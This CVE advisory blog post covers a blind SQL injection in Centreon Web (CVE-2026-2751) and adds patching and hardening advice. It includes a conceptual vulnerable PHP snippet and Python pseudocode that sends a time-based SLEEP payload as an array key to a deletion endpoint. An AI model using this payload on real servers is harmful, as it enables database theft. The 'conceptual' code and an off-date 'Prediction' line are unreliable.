Centreon Web, Blind SQL Injection, CVE-2026-2751 (High)

Listen to this Post

The vulnerability, identified as CVE-2026-2751, is a Blind SQL Injection flaw located in the Service Dependencies deletion feature of Centreon Web on the Central Server . It arises from the application’s failure to properly sanitize array keys supplied by the user during the process of deleting service dependencies . An authenticated attacker with access to this module can craft a malicious HTTP request containing unsanitized input within the array keys. When the backend SQL query is constructed, this malicious input is concatenated directly into the SQL statement instead of being treated as safe data. Because it is a “blind” SQL injection, the attacker does not receive an direct error message from the database; instead, they must infer the success of their attack by observing subtle changes in the application’s behavior or response times . By leveraging time-based payloads, an attacker can extract sensitive data from the database, such as user credentials or configuration secrets, one character at a time. This vulnerability affects all Centreon Web versions on Central Server prior to 25.10.8, 24.10.20, and 24.04.24 .

dailycve form:

Platform: Centreon Linux
Version: <25.10.8,<24.10.20,<24.04.24
Vulnerability :Blind SQL Injection
Severity: HIGH
date: 2026-02-27

Prediction: December 2025

What Undercode Say:

Analytics:

The vulnerability was published on February 27, 2026, and has a CVSS score of 8.3 (High) . The EPSS score probability is not yet publicly available for this specific CVE, but historical Centreon SQLi vulnerabilities have shown active exploitation attempts shortly after disclosure .

Check Current Version:

To determine if your Centreon Web instance is vulnerable, check the version via command line or the web interface.

From the command line on the Central Server
sudo yum info centreon-web | grep Version
Or check the release file
cat /usr/share/centreon/www/install/insertBase.sql | grep "INSERT INTO `informations`" | grep "version"

Vulnerable Code Snippet (Conceptual):

The vulnerability exists in the Service Dependencies deletion script. The following is a conceptual example of the vulnerable pattern, where array keys are directly interpolated into the SQL string.

// Vulnerable pseudocode example in centreon/www/include/configuration/configObject/dependency/DB-Func.php
function deleteServiceDependency($dependencyIds) {
foreach ($dependencyIds as $key => $id) {
// The $key is taken directly from user input and not sanitized
$unsanitizedKey = $key;
// Vulnerability: Direct concatenation of the key into the query string
$query = "DELETE FROM service_dependencies WHERE dep_id = " . $id . " AND dependency_type = '" . $unsanitizedKey . "'";
$this->db->query($query);
}
}

Exploit:

An attacker can exploit this using a time-based blind SQL injection payload in the array key. The following Python pseudocode demonstrates the concept.

import requests
import time
session = requests.Session()
Authenticate first (credentials required)
login_data = {'username': 'attacker', 'password': 'password'}
session.post('https://<centreon-server>/centreon/index.php', data=login_data)
Payload for time-based blind SQL injection (e.g., MySQL sleep)
The payload is injected as an array key, e.g., "key' OR SLEEP(5)-- -"
malicious_key = "1' OR IF((SELECT user() LIKE 'root%'), SLEEP(5), 0)-- -"
dependency_id = "1"
data = {
The key of this dictionary is the injection point
f"select[{malicious_key}]": dependency_id
}
Send the POST request to the deletion endpoint
start_time = time.time()
response = session.post('https://<centreon-server>/centreon/include/configuration/configObject/dependency/deleteServiceDependency.php', data=data)
end_time = time.time()
If response time is >= 5 seconds, the condition was true
print(f"Response time: {end_time - start_time} seconds")

Protection from this CVE:

  1. Patch Immediately: Update Centreon Web to version 25.10.8, 24.10.20, 24.04.24 or later .
  2. Input Validation: Implement strict input validation. Array keys from user input should be treated as untrusted. Use a whitelist of allowed values or cast keys to expected types (e.g., integers) before using them in SQL queries.
  3. Parameterized Queries: Ensure all database interactions, especially those involving user-supplied keys, use prepared statements or parameterized queries. This prevents the interpretation of user input as SQL code.
  4. Principle of Least Privilege: Ensure the database user account used by Centreon Web has the minimum necessary privileges (e.g., no `FILE` privilege, limited to specific databases/tables).

Impact:

Successful exploitation could allow an authenticated attacker to extract the entire database contents . This includes sensitive information such as usernames, password hashes, and configuration data (e.g., database connection strings, poller credentials) . In some scenarios, depending on the database user’s privileges, an attacker might escalate this to writing files to the system or executing operating system commands, leading to full compromise of the Central Server .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top